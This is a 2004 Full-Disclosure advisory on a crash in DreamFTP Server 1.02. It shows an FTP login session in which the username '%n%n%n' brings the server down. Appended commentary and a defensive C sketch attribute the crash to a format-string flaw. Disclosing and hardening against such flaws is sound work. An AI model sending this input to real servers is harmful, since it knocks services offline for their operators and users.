[Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow
- To: full-disclosure@lists.netsys.com
- Subject: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow
- From: "badpack3t" <badpack3t@security-protocols.com>
- Date: Sat, 7 Feb 2004 00:29:54 -0500 (EST)
SP Research Labs Advisory x09
--------------------------------------------
DreamFTP 1.02 Buffer Overflow
--------------------------------------------
Vendor Home Page:
http://www.bolintech.com/
Date Released - 2.6.2004
---------------------------------------------------
Product Description from the vendor:
Dream FTP Server provides powerful, multithreaded and robust FTP server
performance with a user-friendly and easy-of-use interfaces.
--------------------
Buffer Overflow
When connecting to the ftp server and supplying %n%n%n for the username,
the ftp server crashes.
Example:
---------
C:\>ftp 192.168.1.101
Connected to 192.168.1.101.
220- ****************************************
220-
220- Welcome to Dream FTP Server
220- Copyright 2002 - 2004
220- BolinTech Inc.
220-
220- ****************************************
220-
220
User (192.168.1.101:(none)): %n%n%n
Connection closed by remote host.
**Application Crashes**
----------
Exploit:
Not worth the time to debug and code an exploit.
--------------------------------------
Tested on WindowsXP SP1
Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1722
peace out,
------------------------------
badpack3t
www.security-protocols.com
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
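A crash triggered by a username made up only of %n conversions is consistent with the USER argument reaching a printf-family call as its format string; the advisory does not confirm the root cause, so that is an assumption here. The C sketch below is an added example, not code from the advisory or from DreamFTP: it shows the hardened logging form and a check that flags conversion specifiers in an FTP command argument (`log_user` and `count_format_specs` are hypothetical names, and the sample inputs are constructed).

```c
#include <stdio.h>
#include <string.h>

/* Assumed root cause (not confirmed by the advisory): the server passes the
 * USER argument to a printf-family call as the format string, e.g.
 *     sprintf(line, user);            // weak: client controls the format
 * Each %n then makes the call write through a pointer taken from the stack. */

/* Hardened form: constant format, client data only as an argument, bounded. */
int log_user(char *out, size_t outlen, const char *user)
{
    int n = snprintf(out, outlen, "USER %s", user);
    return (n >= 0 && (size_t)n < outlen) ? n : -1;  /* -1 on truncation */
}

/* Detection helper: count printf conversion specifications in an FTP
 * command argument. "%%" is a literal percent and is not counted. */
int count_format_specs(const char *arg)
{
    int count = 0;
    for (const char *p = arg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }
        /* skip flags, width, precision and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*hlLqjzt", *q))
            q++;
        if (*q && strchr("diouxXeEfgGaAcspn", *q)) {
            count++;
            p = q;
        }
    }
    return count;
}

int main(void)
{
    /* Constructed sample inputs; the first is the username from the advisory. */
    const char *samples[] = { "%n%n%n", "anonymous", "100%% legit", "a%08xb" };
    char line[64];
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        int len = log_user(line, sizeof line, samples[i]);
        printf("%-12s specs=%d logged=\"%s\" (len=%d)\n", samples[i],
               count_format_specs(samples[i]), line, len);
    }
    return 0;
}
```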